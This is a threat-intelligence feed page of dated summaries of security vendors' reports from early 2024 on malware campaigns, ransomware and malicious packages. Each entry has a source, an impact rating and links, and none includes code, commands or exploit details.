2024-02-05
Impact:
LOW
Summary:
AnyRun researchers dive into a recent case of something they call a “malware symphony.” It’s a way to describe how different types of malware can work together, sort of like instruments in an orchestra.
Source: https://any.run/cybersecurity-blog/crackedcantil-breakdown/
Intel Source:
Cado Security
Intel Name:
Examining_New_Malware_Operation_Aimed_Against_Docker
Date of Scan:
2024-02-05
Impact:
LOW
Summary:
Researchers at Cado have discovered the Commando Cat malware campaign, which targets Docker API endpoints exposed to the public. Since the start of 2024, there have been two campaigns targeting Docker. The first was the malicious deployment of the 9hits traffic exchange application, the results of which were reported just a few weeks ago.
Source: https://www.cadosecurity.com/the-nine-lives-of-commando-cat-analysing-a-novel-malware-campaign-targeting-docker/
Intel Source:
Securonix
Intel Name:
New_SUBTLE_PAWS_PowerShell_Backdoor_Drops_on_Ukraine
Date of Scan:
2024-02-02
Impact:
MEDIUM
Summary:
Securonix researchers have identified an ongoing campaign (tracked as STEADY#URSA) that is likely tied to Shuckworm and targets military personnel in Ukraine. Perhaps via phishing emails, compressed files are used to transmit the harmful payload. The study found that military jargon and references to Ukrainian cities were present in a large number of the samples. Given that the attack includes multiple TTPs that are only utilized by the organization and have been mentioned in previous campaigns against the Ukrainian military, it is most likely connected to Shuckworm.
Source: https://www.securonix.com/blog/security-advisory-steadyursa-attack-campaign-targets-ukraine-military/
Intel Source:
ASEC
Intel Name:
Hackers_Establishing_Backdoor_Accounts_on_Linux
Date of Scan:
2024-02-02
Impact:
LOW
Summary:
Attack campaigns that involve installing a backdoor account on unmanaged Linux SSH servers have been identified for a long time. Threat actors will have the option to either sell the credentials they have gathered from the compromised systems on the dark web or utilize the extra backdoor accounts to later install malware strains like ransomware, CoinMiners, and DDoS bots on the compromised system.
Source: https://asec.ahnlab.com/en/61185/
Intel Source:
Cloudflare
Intel Name:
An_Incident_Occurred_During_Thanksgiving_2023
Date of Scan:
2024-02-02
Impact:
LOW
Summary:
On November 23, 2023, Thanksgiving Day, Cloudflare discovered a threat actor on its self-hosted Atlassian server. Its security team shut down the threat actor's access right away and launched an investigation, and on Sunday, November 26, it invited CrowdStrike's forensic team to conduct its own independent investigation.
Source: https://blog.cloudflare.com/thanksgiving-2023-security-incident
Intel Source:
Palo Alto
Intel Name:
A_large_scale_campaign_called_ApateWeb
Date of Scan:
2024-02-01
Impact:
LOW
Summary:
Unit 42 researchers discovered a large-scale campaign they call ApateWeb that uses a network of over 130,000 domains to deliver scareware, potentially unwanted programs (PUPs), and other scam pages. Among these PUPs, they identified several adware programs, including a rogue browser and various browser extensions.
Source: https://unit42.paloaltonetworks.com/apateweb-scareware-pup-delivery-campaign/
Intel Source:
Cado Security
Intel Name:
A_novel_cryptojacking_campaign_Commando_Cat
Date of Scan:
2024-02-01
Impact:
LOW
Summary:
Cado researchers have recently observed a new malware campaign, called "Commando Cat", which targeted exposed Docker API endpoints. This is the second campaign targeting Docker since the start of 2024, the first being the malicious deployment of the 9hits traffic exchange application.
Source: https://www.cadosecurity.com/the-nine-lives-of-commando-cat-analysing-a-novel-malware-campaign-targeting-docker/
Intel Source:
Malwarebytes
Intel Name:
A_recent_Nitrogen_malware_campaign
Date of Scan:
2024-02-01
Impact:
LOW
Summary:
Malwarebytes in their blog analyzed a recent Nitrogen campaign and how the initial payload is being served to victims. The threat actors prefer to host their payloads on compromised WordPress sites, many of which are already hacked with malicious PHP shell scripts.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2024/01/nitrogen-shelling-malware-from-hacked-sites
Intel Source:
CERT-UA
Intel Name:
Over_2000_PCs_in_Ukraine_Impacted_by_DIRTYMOE
Date of Scan:
2024-02-01
Impact:
MEDIUM
Summary:
For over five years, DIRTYMOE has been recognized as modular malware that provides tools for remote computer access; it is primarily (though not exclusively) employed for mining and DDoS attacks. Typically, the initial infection is caused by widely used software that comes bundled with an MSI installer. A rootkit installed with the backdoor hinders the removal of operating system components from the file system and registry when the system is in normal mode.
Source: https://cert.gov.ua/article/6277422
Intel Source:
Synacktiv
Intel Name:
KRUSTYLOADER_RUST_malware_analysis
Date of Scan:
2024-02-01
Impact:
LOW
Summary:
On 18 January, Volexity published new evidence of compromised Ivanti Connect Secure instances, including hashes of Rust payloads downloaded onto the compromised instances. Synacktiv shared in their article a malware analysis of these unidentified Rust payloads, which they labeled KrustyLoader.
Source: https://www.synacktiv.com/publications/krustyloader-rust-malware-linked-to-ivanti-connectsecure-compromises
Intel Source:
Stairwell
Intel Name:
A_new_variant_of_VileRAT_malware
Date of Scan:
2024-02-01
Impact:
LOW
Summary:
Last month, Stairwell's research team observed a new variant of VileRAT that has been circulating since August 2023, following public reports and the detection of related filenames. The analysis showed that this variant is being distributed through fake software piracy sites to broadly infect systems.
Source: https://stairwell.com/resources/technical-analysis-the-silent-torrent-of-vilerat/
Intel Source:
TrendMicro
Intel Name:
An_Attack_Using_Stealth_And_Brute_Force
Date of Scan:
2024-01-31
Impact:
LOW
Summary:
TrendMicro researchers have found that Pawn Storm remains unwavering in its pursuit to breach the networks and email accounts of high-profile targets worldwide. The group initially employed brute-force attacks from dedicated servers and later integrated more anonymization layers like commercial VPN services and Tor.
Source: https://www.trendmicro.com/en_us/research/24/a/pawn-storm-uses-brute-force-and-stealth.html
Intel Source:
Proofpoint
Intel Name:
The_Return_of_TA576
Date of Scan:
2024-01-31
Impact:
LOW
Summary:
Researchers at Proofpoint have discovered the reappearance of TA576, a cybercriminal threat actor that targets accounting and finance companies in particular with tax-themed lures. This actor mostly targets North American organizations with low-volume email campaigns and is only active during the first few months of the year, during tax season in the United States. In every campaign, the actor tries to distribute remote access trojans (RATs) and responds to emails asking for help with tax preparation.
Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-tis-season-tax-hax
Intel Source:
Cluster25
Intel Name:
The_Russian_Opposition_Faces_New_Campaign
Date of Scan:
2024-01-31
Impact:
LOW
Summary:
Researchers from Cluster25 have discovered a recently launched campaign that is probably connected to a Russian APT group. The spear-phishing emails used in this effort went after organizations that supported Russian dissident movements and were publicly critical of the Russian government, both inside and outside the country.
Source: https://blog.cluster25.duskrise.com/2024/01/30/russian-apt-opposition
Intel Source:
Welivesecurity
Intel Name:
The_Grandoreiro_banking_trojan_operation
Date of Scan:
2024-01-31
Impact:
LOW
Summary:
ESET has provided technical analysis, statistical information, and known command and control (C&C) server domain names and IP addresses. Due to a design flaw in Grandoreiro’s network protocol, ESET researchers were also able to get a glimpse into the victimology.
Source: https://www.welivesecurity.com/en/eset-research/eset-takes-part-global-operation-disrupt-grandoreiro-banking-trojan/
Intel Source:
CSIRT-CTI
Intel Name:
China_linked_hackers_target_Myanmar_s_top_ministries
Date of Scan:
2024-01-31
Impact:
MEDIUM
Summary:
Mustang Panda, the China-based threat actor, has targeted Myanmar's Ministry of Defence and Ministry of Foreign Affairs as part of twin campaigns designed to deploy backdoors and remote access trojans.
Source: https://csirt-cti.net/2024/01/23/stately-taurus-targets-myanmar/
Intel Source:
Mandiant
Intel Name:
The_Hidden_Depths_of_USB_Malware
Date of Scan:
2024-01-31
Impact:
LOW
Summary:
Mandiant researchers have discovered a distinct evolution in the TTPs from the campaign's early stages, commencing with the use of the explorer.ps1 payload featuring a custom decoding scheme. This progressed to the adoption of asymmetric encryption, accompanied by the incorporation of device tracking capabilities.
Source: https://www.mandiant.com/resources/blog/unc4990-evolution-usb-malware
Intel Source:
Inquest
Intel Name:
The_malicious_URL_file_uses
Date of Scan:
2024-01-30
Impact:
LOW
Summary:
Inquest shared their details about the exploration of URL files, and their resurgence in the threat space as various vulnerabilities and exposures have led to adversaries finding utility in this simple file type.
Source: https://inquest.net/blog/shortcut-to-malice-url-files/
Intel Source:
ASEC
Intel Name:
Attacker_of_Trigona_Ransomware_Using_Mimic_Ransomware
Date of Scan:
2024-01-30
Impact:
LOW
Summary:
ASEC researchers discovered a new way that the threat actor behind the Trigona ransomware is installing Mimic ransomware. Similar to previous instances, the newly discovered attack focuses on MS-SQL servers and is noteworthy for exploiting the MS-SQL servers' Bulk Copy Program (BCP) feature to install malware.
Source: https://asec.ahnlab.com/en/61000/
Intel Source:
Fortinet
Intel Name:
Albabat_Ransomware_roundup
Date of Scan:
2024-01-30
Impact:
MEDIUM
Summary:
FortiGuard Labs analysts researched a ransomware variant that caught their attention, called Albabat. Albabat, also known as White Bat, is a financially motivated ransomware variant written in Rust that finds and encrypts files important to the user and demands a ransom to release them. It first appeared in November 2023. The affected platform is Microsoft Windows, and the impacted parties are Microsoft Windows users.
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-albabat
Intel Source:
Zscaler
Intel Name:
Zloader_Returned_With_New_Iteration
Date of Scan:
2024-01-30
Impact:
LOW
Summary:
Zscaler researchers have discovered that Zloader has come back with an updated version, signaling a potential increase in ransomware attacks. The latest iteration of Zloader includes significant enhancements to its loader module, incorporating RSA encryption, an improved Domain Generation Algorithm (DGA), and advanced obfuscation techniques. Additionally, the malware now employs more junk code, API import hashing, and string encryption, making it more resilient against malware analysis.
Source: https://www.zscaler.com/blogs/security-research/zloader-no-longer-silent-night
Intel Source:
Red Canary
Intel Name:
MSIX_installers_deliver_malware_payloads
Date of Scan:
2024-01-30
Impact:
LOW
Summary:
Starting in July 2023, Red Canary began investigating a series of attacks by adversaries leveraging MSIX files to deliver malware. The adversaries in each intrusion appeared to be using malicious advertising or SEO poisoning to draw in victims, who believed that they were downloading legitimate software such as Grammarly, Microsoft Teams, Notion, and Zoom.
Source: https://redcanary.com/blog/msix-installers/
Intel Source:
Cybereason
Intel Name:
Examining_DarkGate_Loader_in_Depth
Date of Scan:
2024-01-30
Impact:
LOW
Summary:
Researchers at Cybereason have looked at incidents involving the modular loader known as DarkGate Loader, which is delivered via phishing emails and is responsible for delivering post-exploitation payloads. Threat actors use the DarkGate Loader AutoIt script to deliver an encrypted payload, which the AutoIt script decrypts and injects into various processes. In the end, DarkGate Loader leads to the use of post-exploitation tools such as Meterpreter and Cobalt Strike.
Source: https://www.cybereason.com/hubfs/dam/collateral/reports/darkgate-threat-alert.pdf
Intel Source:
Netenrich
Intel Name:
A_Deep_Dive_into_Alpha_Ransomware
Date of Scan:
2024-01-30
Impact:
LOW
Summary:
Netenrich researchers provided updates on Alpha ransomware, a completely different group from ALPHV ransomware, which has recently emerged with the launch of its Dedicated/Data Leak Site on the Dark Web and an initial listing of six victims' data.
Source: https://netenrich.com/blog/alpha-ransomware-a-deep-dive-into-its-operations
Intel Source:
AT&T and PaloAlto
Intel Name:
Microsoft_Teams_Delivers_DarkGate_Malware
Date of Scan:
2024-01-30
Impact:
MEDIUM
Summary:
Although the majority of end users are probably aware of the risks associated with traditional phishing attacks, such as those that arrive by email or other media, many are probably not aware that Microsoft Teams chats could also be a potential source of phishing attacks. While most Teams activity takes place within an organization, Microsoft by default permits users to add persons from outside the organization to their Teams chats. This function has, somewhat unsurprisingly, given bad actors a new way to take advantage of unsuspecting or inexperienced users.
Source: https://cybersecurity.att.com/blogs/security-essentials/darkgate-malware-delivered-via-microsoft-teams-detection-and-response https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2023-10-12-IOCs-for-DarkGate-from-Teams-chat.txt
Intel Source:
Fortinet
Intel Name:
An_Additional_Phobos_Ransomware_Variant_Initiates_an_Attack
Date of Scan:
2024-01-29
Impact:
LOW
Summary:
Researchers from FortiGuard Labs have discovered an Office document that includes a VBA script meant to spread the FAUST ransomware, a variant of Phobos. The attackers used the Gitea service to store many Base64-encoded files, each containing a malicious binary. These files start a file encryption attack when they are loaded into a system's memory.
Source: https://www.fortinet.com/blog/threat-research/phobos-ransomware-variant-launches-attack-faust
Intel Source:
ISC.SANS
Intel Name:
A_Batch_File_Holding_Several_Payloads
Date of Scan:
2024-01-29
Impact:
LOW
Summary:
Although most people consider Windows batch files (.bat) to be extremely basic, they can actually be fairly complicated or include intriguing encoded payloads. Researchers discovered one that was being used by a PowerShell process and contained several payloads. The trick lies in how comments are added to these kinds of files: "REM" is the default (or most popular) keyword to use.
Source: https://isc.sans.edu/diary/rss/30592
Intel Source:
Blackberry
Intel Name:
Persistent_Cyber_Threats_Targeting_Mexican_Entities
Date of Scan:
2024-01-29
Impact:
LOW
Summary:
The BlackBerry Threat Research and Intelligence team has found that cyber attackers are consistently targeting Mexican organizations for financial gain. They use legitimate Mexican government resources as lures, such as the IDSE software update document and the IMSS payment system SIPARE.
Source: https://blogs.blackberry.com/en/2024/01/mexican-banks-and-cryptocurrency-platforms-targeted-with-allakore-rat
Intel Source:
SOC Radar
Intel Name:
Russian_APT_Operation_Star_Blizzard
Date of Scan:
2024-01-29
Impact:
MEDIUM
Summary:
Star Blizzard's strategies operate in the ever-evolving cyber threat arena with a measured precision that is akin to a strategic orchestration. In this case, spear-phishing mimics a method that has been meticulously thought out and carried out. This elusive group, with an advanced level of intelligence akin to that of seasoned professionals, methodically pinpoints individual and group members as their intended audience.
Source: https://socradar.io/russian-apt-operation-star-blizzard/
Intel Source:
The DFIR Report
Intel Name:
Attackers_Exploiting_Publicly_Exposed_RDP_Host
Date of Scan:
2024-01-29
Impact:
MEDIUM
Summary:
Researchers at The DFIR Report saw threat actors in late December 2022 taking advantage of a publicly accessible Remote Desktop Protocol server, which resulted in the exfiltration of data and the installation of the Trigona ransomware. The threat actors spread ransomware throughout the network on Christmas Eve, just three hours after they first gained access.
Source: https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/
Intel Source:
Cyble
Intel Name:
An_ongoing_phishing_campaign_spreads_with_an_Atomic_Stealer_version
Date of Scan:
2024-01-26
Impact:
MEDIUM
Summary:
Cyble researchers discovered a new version of AMOS Stealer being distributed through websites impersonating legitimate Mac applications, including Parallels Desktop, CleanMyMac, Arc Browser, and Pixelmator. Earlier this year, the AMOS stealer was circulating via Google Ads, which served as its main distribution method.
Source: https://cyble.com/blog/uncovering-atomic-stealer-amos-strikes-and-the-rise-of-dead-cookies-restoration/
Intel Source:
Sonatype
Intel Name:
Malware_Drops_From_Fake_NPM_Package
Date of Scan:
2024-01-25
Impact:
LOW
Summary:
Researchers from Sonatype have discovered two npm packages, distube-config and discordyt, that mimic open source products such as Discord modules in an effort to infect Windows users with a Trojan.
Source: https://blog.sonatype.com/fake-distube-config-npm-package-drops-windows-info-stealing-malware
Intel Source:
Arcticwolf
Intel Name:
Mimicking_CherryTree_to_Deploy_PrawEsc_Exploits
Date of Scan:
2024-01-25
Impact:
LOW
Summary:
According to Arctic Wolf researchers, the loader poses as the authentic CherryTree note-taking program through its name and symbol, tricking potential victims into installing it. They have found evidence of this new attack tool in two recent incidents.
Source: https://arcticwolf.com/resources/blog/cherryloader-a-new-go-based-loader-discovered-in-recent-intrusions/
Intel Source:
Shadowstackre
Intel Name:
Cactus_Ransomware_continued_activity
Date of Scan:
2024-01-25
Impact:
LOW
Summary:
On January 20th, the Cactus ransomware group again targeted a large number of victims across different industries. The attacks were revealed through the victims' data posted on the group's leak site. The ransomware group constantly puts pressure on victims by revealing personal information about employees of the victim organization; this has included driver's licenses, passports, pictures, and other personal identification.
Source: https://www.shadowstackre.com/analysis/cactus
Intel Source:
Palo Alto
Intel Name:
The_BianLian_ransomware_group
Date of Scan:
2024-01-25
Impact:
MEDIUM
Summary:
The article discusses the detection and prevention of the BianLian encryptor and backdoor by Cortex XDR, as well as the use of SmartScore and protections offered by Palo Alto Networks. It also provides a list of IP addresses associated with the BianLian ransomware gang and additional resources for further information. The article also explores a potential connection between the BianLian and Makop ransomware groups and provides a technical analysis of the attack lifecycle of the BianLian group. It includes screenshots of alerts and prevention measures taken by Cortex XDR. The article also lists various codes and IP addresses related to the threat assessment of the malware.
Source: https://unit42.paloaltonetworks.com/bianlian-ransomware-group-threat-assessment/
Intel Source:
Welivesecurity
Intel Name:
New_China_Aligned_APT_Group_Called_Blackwood_Using_NSPX30_implants
Date of Scan:
2024-01-25
Impact:
MEDIUM
Summary:
Researchers from ESET have presented a study of an attack carried out by Blackwood, a previously unidentified threat actor that they believe has been active since at least 2018. Blackwood is associated with China. Using adversary-in-the-middle (AitM) attacks, the attackers distribute a sophisticated implant they have termed NSPX30. They do this by hijacking update requests made by legitimate software.
Source: https://www.welivesecurity.com/en/eset-research/nspx30-sophisticated-aitm-enabled-implant-evolving-since-2005/
2024-01-25
An_Italian_Adaptive_Phishing_Campaign_called_MY_SLICE
LOW
+
Intel Source:
Security Affairs
Intel Name:
An_Italian_Adaptive_Phishing_Campaign_called_MY_SLICE
Date of Scan:
2024-01-25
Impact:
LOW
Summary:
A highly targeted phishing campaign last year hit email account holders of Italian organizations under the alias "My slice," a name taken from a variable in the landing page's JavaScript code.
Source: https://securityaffairs.com/157914/cyber-crime/my-slice-aitalian-adaptive-phishing-campaign.html
2024-01-25
The_Evolution_of_LODEINFO_Fileless_Malware
LOW
+
Intel Source:
ITOCHU Cyber & Intelligence Inc.
Intel Name:
The_Evolution_of_LODEINFO_Fileless_Malware
Date of Scan:
2024-01-25
Impact:
LOW
Summary:
ITOCHU Cyber & Intelligence Inc. researchers have discovered an updated variant of the LODEINFO backdoor, which is disseminated through spear-phishing attacks. Both new features and modifications to the anti-analysis (analysis avoidance) strategies have been added to the malware.
Source: https://blog-en.itochuci.co.jp/entry/2024/01/24/134100
2024-01-24
Parrot_TDS_malware_campaign
MEDIUM
+
Intel Source:
Palo Alto
Intel Name:
Parrot_TDS_malware_campaign
Date of Scan:
2024-01-24
Impact:
MEDIUM
Summary:
The article provides an overview of the Parrot TDS malware campaign, which has been active for over four years and continues to evolve with new techniques and obfuscations. The campaign targets victims globally and uses automatic tools to exploit known vulnerabilities, with the majority of compromised servers using WordPress, Joomla, or other content management systems. The article includes a list of codes and identifiers related to the campaign, as well as examples of the landing and payload scripts used. It also discusses the protections and mitigations offered by Palo Alto Networks and provides indicators of compromise for detecting and defending against malware.
Source: https://unit42.paloaltonetworks.com/parrot-tds-javascript-evolution-analysis/
2024-01-24
Kasseika_Ransomware_Exploiting_LNK_Vulnerabilities
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Kasseika_Ransomware_Exploiting_LNK_Vulnerabilities
Date of Scan:
2024-01-24
Impact:
MEDIUM
Summary:
AhnLab Security Intelligence Center exposes a stealthy attack leveraging a malicious Word document disguised as an .lnk shortcut file. The attack, featuring the notorious AsyncRAT (VenomRAT), uses PowerShell commands and external URLs to download and execute payloads. The malware disguises itself as a Korean company's certificate, making detection challenging.
Source: https://asec.ahnlab.com/en/60805/
2024-01-24
Massive_Criminal_Affiliate_Program_by_Vextrio
LOW
+
Intel Source:
Infoblox
Intel Name:
Massive_Criminal_Affiliate_Program_by_Vextrio
Date of Scan:
2024-01-24
Impact:
LOW
Summary:
Researchers from Infoblox expose a complex web of affiliations within the cybercrime ecosystem, focusing on prominent actors like VexTrio, ClearFake, and SocGholish. Collaboratively researched with security expert Randy McEoin, the study reveals these entities' involvement in malicious activities, particularly in operating traffic distribution systems (TDS). VexTrio, a major player, is identified as the most pervasive threat in customer networks, acting as a traffic broker for over 60 affiliates. The research sheds light on their unique TDS model, attack chains involving multiple actors, and their exploitation of referral programs. The findings emphasize the critical role of TDS enterprises in the vast cybercrime economy and advocate for increased industry collaboration to counter these threats effectively.
Source: https://blogs.infoblox.com/cyber-threat-intelligence/cybercrime-central-vextrio-operates-massive-criminal-affiliate-program/
2024-01-23
Attackers_Using_GitHub_to_Store_Stolen_Data
LOW
+
Intel Source:
Reversing Labs
Intel Name:
Attackers_Using_GitHub_to_Store_Stolen_Data
Date of Scan:
2024-01-23
Impact:
LOW
Summary:
Two malicious packages on the npm open source package manager have been found by ReversingLabs researchers. These packages use GitHub to store stolen Base64-encrypted SSH keys taken from the developer workstations that installed them.
Source: https://www.reversinglabs.com/blog/gitgot-cybercriminals-using-github-to-store-stolen-data
2024-01-23
Update_on_Atlassian_Exploit_Activity_of_critical_vulnerabilty_CVE_2023_22527
HIGH
+
Intel Source:
Project Discovery, ISC.SANS, Picus Security
Intel Name:
Update_on_Atlassian_Exploit_Activity_of_critical_vulnerabilty_CVE_2023_22527
Date of Scan:
2024-01-23
Impact:
HIGH
Summary:
Exploit activity against Atlassian Confluence servers has exploded in the last couple of days. The combination of a simple-to-exploit vulnerability and a potential set of high-value targets makes this an ideal vulnerability for many attackers. On January 16, 2024, Atlassian shared a disclosure about a remote code execution vulnerability affecting Confluence Data Center and Confluence Server. CVE-2023-22527 is an OGNL injection vulnerability with a CVSS score of 10. This critical vulnerability poses a significant risk to organizations.
Source: https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/ https://isc.sans.edu/diary/Scans%20Exploit%20Attempts%20for%20Atlassian%20Confluence%20RCE%20Vulnerability%20CVE-2023-22527/30576 https://isc.sans.edu/diary/0 https://www.picussecurity.com/resource/blog/cve-2023-22527-another-ognl-injection-leads-to-rce-in-atlassian-confluence
2024-01-23
New_Legitimate_Program_Unveiled_In_DLL_Side_Loading_Attack
LOW
+
Intel Source:
ASEC
Intel Name:
New_Legitimate_Program_Unveiled_In_DLL_Side_Loading_Attack
Date of Scan:
2024-01-23
Impact:
LOW
Summary:
AhnLab Security Intelligence Center (ASEC) reveals the Lazarus Group's latest cyber threat tactic involving a new legitimate program, "wmiapsrv.exe," discovered on January 12, 2024. This program, utilized in DLL side-loading attacks (T1574.002), loads modified malicious DLLs, such as "wbemcomn.dll" and "netutils.dll," serving as backdoors. The verification routine in wbemcomn.dll involves unique system information, making this an Advanced Persistent Threat (APT) attack aimed at specific systems.
Source: https://asec.ahnlab.com/en/60792/
2024-01-23
Ransomware_Kasseika_Using_BYOVD_Attacks
LOW
+
Intel Source:
TrendMicro
Intel Name:
Ransomware_Kasseika_Using_BYOVD_Attacks
Date of Scan:
2024-01-23
Impact:
LOW
Summary:
TrendMicro researchers have examined the Kasseika ransomware and the indications they discovered imply that the perpetrators had obtained the source code of the infamous BlackMatter ransomware.
Source: https://www.trendmicro.com/en_us/research/24/a/kasseika-ransomware-deploys-byovd-attacks-abuses-psexec-and-expl.html
2024-01-23
MetaStealer_Malware_Targeting_US_Asylum_Seekers
LOW
+
Intel Source:
Cyble
Intel Name:
MetaStealer_Malware_Targeting_US_Asylum_Seekers
Date of Scan:
2024-01-23
Impact:
LOW
Summary:
Researchers at Cyble have discovered a ZIP archive file that may be downloaded from a URL and might be shared via spam emails. There is a shortcut LNK file hidden as a PDF document inside the ZIP package. The VPN application launches when the shortcut file is executed, and it uses DLL sideloading to load a hidden malicious DLL. The DLL and the VPN program are both hidden within a ZIP file.
Source: https://cyble.com/blog/threat-actors-target-us-asylum-seekers-with-metastealer-malware/
2024-01-23
PyPI_Packages_That_Steal_Information
LOW
+
Intel Source:
Fortinet
Intel Name:
PyPI_Packages_That_Steal_Information
Date of Scan:
2024-01-23
Impact:
LOW
Summary:
Researchers from Fortinet have discovered a PyPI malware author (known only by the ID "WS") who quietly uploads malicious packages to PyPI. According to their current estimates, there could be more than 2000 "WS" victims from the packages listed below alone.
Source: https://www.fortinet.com/blog/threat-research/info-stealing-packages-hidden-in-pypi
2024-01-23
Hackers_Targeting_Cybersecurity_Professionals
MEDIUM
+
Intel Source:
Sentinelone
Intel Name:
Hackers_Targeting_Cybersecurity_Professionals
Date of Scan:
2024-01-23
Impact:
MEDIUM
Summary:
Researchers at SentinelLabs have noticed a campaign by ScarCruft, a suspected APT outfit based in North Korea, that targets prominent figures with knowledge of North Korean affairs as well as media outlets. ScarCruft is experimenting with new infection chains; one such trial used a technical threat research paper as a ruse, presumably aimed at consumers of threat intelligence such as cybersecurity experts.
Source: https://www.sentinelone.com/labs/a-glimpse-into-future-scarcruft-campaigns-attackers-gather-strategic-intelligence-and-target-cybersecurity-professionals/
2024-01-22
Backdoor_in_macOS_Steals_Cryptowallets
LOW
+
Intel Source:
Securelist
Intel Name:
Backdoor_in_macOS_Steals_Cryptowallets
Date of Scan:
2024-01-22
Impact:
LOW
Summary:
Researchers at Securelist have discovered a previously unidentified type of macOS malware distributed through cracked software. The threat turned out to be much more serious than the unauthorized installation of a proxy server.
Source: https://securelist.com/new-macos-backdoor-crypto-stealer/111778/
2024-01-22
Attack_With_UAC_0050_Using_RemoteUtilities
LOW
+
Intel Source:
CERT-UA
Intel Name:
Attack_With_UAC_0050_Using_RemoteUtilities
Date of Scan:
2024-01-22
Impact:
LOW
Summary:
Researchers from CERT-UA have uncovered evidence of a widespread dissemination of emails purporting to be from the State Emergency Service of Ukraine and the State Special Communications Service. The emails contained links to Bitbucket or a RAR archive and were ostensibly about "evacuations" and "virus removal."
Source: https://cert.gov.ua/article/6277285
2024-01-22
Update_to_the_Chaes_malware
LOW
+
Intel Source:
Morphisec
Intel Name:
Update_to_the_Chaes_malware
Date of Scan:
2024-01-22
Impact:
LOW
Summary:
Morphisec Threat Labs has provided an analysis of Chae$ 4.1, an update to the Chaes Infostealer malware.
Source: https://www.morphisec.com/hubfs/Chae$_Chronicles_Chaes4.1.pdf https://blog.morphisec.com/chaes-chronicles
2024-01-22
SmokeLoader_Distribution_Aims_at_Ukrainian_Government_and_Businesses
MEDIUM
+
Intel Source:
ASEC
Intel Name:
SmokeLoader_Distribution_Aims_at_Ukrainian_Government_and_Businesses
Date of Scan:
2024-01-22
Impact:
MEDIUM
Summary:
Researchers from ASEC have found that the Ukrainian government and businesses are being hit by many SmokeLoader malware infections. Attacks on Ukraine appear to have grown in frequency recently. The Ukrainian Department of Justice, government agencies, insurance providers, healthcare providers, construction businesses, and manufacturing companies are among the targets confirmed thus far.
Source: https://asec.ahnlab.com/en/60703/
2024-01-22
Cryptomine_Exploit_Connect
MEDIUM
+
Intel Source:
Greynoise
Intel Name:
Cryptomine_Exploit_Connect
Date of Scan:
2024-01-22
Impact:
MEDIUM
Summary:
The article discusses a recent exploit of Ivanti Connect Secure, a remote access software, to install cryptominers on affected systems. It includes details on the files, file paths, IP addresses involved in the exploit, and recommendations for organizations to block the listed IPs. The article also provides a decoded URL and shell script used in the attack and advice for detecting and preventing similar attacks. The author shares their experience of discovering the exploit and provides a script that exploits Ivanti Connect Secure to install cryptominers. The article also discusses creating a plan for a task, including checking for sudo privileges and creating a system service for the miner. It also includes a configuration file for the miner and information on the pool it connects to.
Source: https://www.greynoise.io/blog/ivanti-connect-secure-exploited-to-install-cryptominers
2024-01-22
Kuiper_Ransomware_s_advanced_capabilities
LOW
+
Intel Source:
Trellix
Intel Name:
Kuiper_Ransomware_s_advanced_capabilities
Date of Scan:
2024-01-22
Impact:
LOW
Summary:
Trellix researchers shared their analysis of the threat actor's sales post for the ransomware, its binaries targeting Windows, Linux, and macOS, and a version comparison. The version comparison is included in the technical analysis. The analyzed files, their hashes, and the detection information are listed at the end of the blog.
Source: https://www.trellix.com/about/newsroom/stories/research/the-evolution-of-the-kuiper-ransomware/
2024-01-22
Using_9Hits_Maliciously_on_Susceptible_Docker_Hosts
LOW
+
Intel Source:
Cado Security
Intel Name:
Using_9Hits_Maliciously_on_Susceptible_Docker_Hosts
Date of Scan:
2024-01-22
Impact:
LOW
Summary:
Researchers at Cado Security have noticed a new campaign that targets vulnerable Docker services. The campaign installs the 9hits viewer application and a standard XMRig miner in two containers on the vulnerable instance. This is the first reported instance of malware using the 9hits application as a payload.
Source: https://www.cadosecurity.com/containerised-clicks-malicious-use-of-9hits-on-vulnerable-docker-hosts/
2024-01-22
Using_Discord_Bot_for_advanced_info_stealer
LOW
+
Intel Source:
Trellix
Intel Name:
Using_Discord_Bot_for_advanced_info_stealer
Date of Scan:
2024-01-22
Impact:
LOW
Summary:
The article discusses a Java-based malware that is being spread through cracked software zip files. The malware uses a Discord bot channel as an EventListener to steal sensitive information from the victim's system. The delivery mechanism and threat analysis of the malware are discussed, along with its capabilities of stealing various data from browsers and applications. The article also includes indicators of compromise and recommendations for protection against such threats.
Source: https://www.trellix.com/about/newsroom/stories/research/java-based-sophisticated-stealer-using-discord-bot-as-eventlistener/
2024-01-22
The_Trust_in_Digitally_Signed_Certificates_Is_Not_Always_Secure
MEDIUM
+
Intel Source:
Stairwell
Intel Name:
The_Trust_in_Digitally_Signed_Certificates_Is_Not_Always_Secure
Date of Scan:
2024-01-22
Impact:
MEDIUM
Summary:
According to Stairwell threat experts, "Hainan YouHu Technology Co. Ltd." is responsible for submitting the LaiXi file to Microsoft so that it can be signed. This app is made for social media content marketing and bulk administration of mobile devices. The program may be downloaded for Windows and Android from dl.cnhack[.]com. Interestingly, the infected sample examined came from a LaiXi_setup.exe file.
Source: https://stairwell.com/resources/signed-sealed-but-not-always-secure-rethinking-trust-in-digitally-signed-certificates/
2024-01-20
A_malicious_Python_package_analysis
LOW
+
Intel Source:
Checkmarx
Intel Name:
A_malicious_Python_package_analysis
Date of Scan:
2024-01-20
Impact:
LOW
Summary:
Checkmarx researchers did a deep analysis of a malicious Python package. Threat actors continue to target the open-source software ecosystem, not only because it represents one of the largest attack surfaces, but because it often escapes the vigilant eyes of organizations.
Source: https://checkmarx.com/blog/when-the-hunter-becomes-the-hunted/
2024-01-20
New_malware_embedded_in_pirated_macOS_applications
LOW
+
Intel Source:
Jamf
Intel Name:
New_malware_embedded_in_pirated_macOS_applications
Date of Scan:
2024-01-20
Impact:
LOW
Summary:
Jamf Threat Labs researchers recently analyzed, in their blog, malware they observed in pirated macOS applications. These apps appeared similar to ZuRu malware, downloading and executing multiple payloads in the background to compromise machines.
Source: https://www.jamf.com/blog/jtl-malware-pirated-applications/
2024-01-20
A_malicious_Python_script_attacks_macOS_apps
LOW
+
Intel Source:
ISC.SANS
Intel Name:
A_malicious_Python_script_attacks_macOS_apps
Date of Scan:
2024-01-20
Impact:
LOW
Summary:
Xavier Mertens, an ISC SANS researcher, found a malicious Python script targeting wallet applications on macOS. It targets two applications, Exodus3 and Bitcoin Core, and searches for occurrences of these applications.
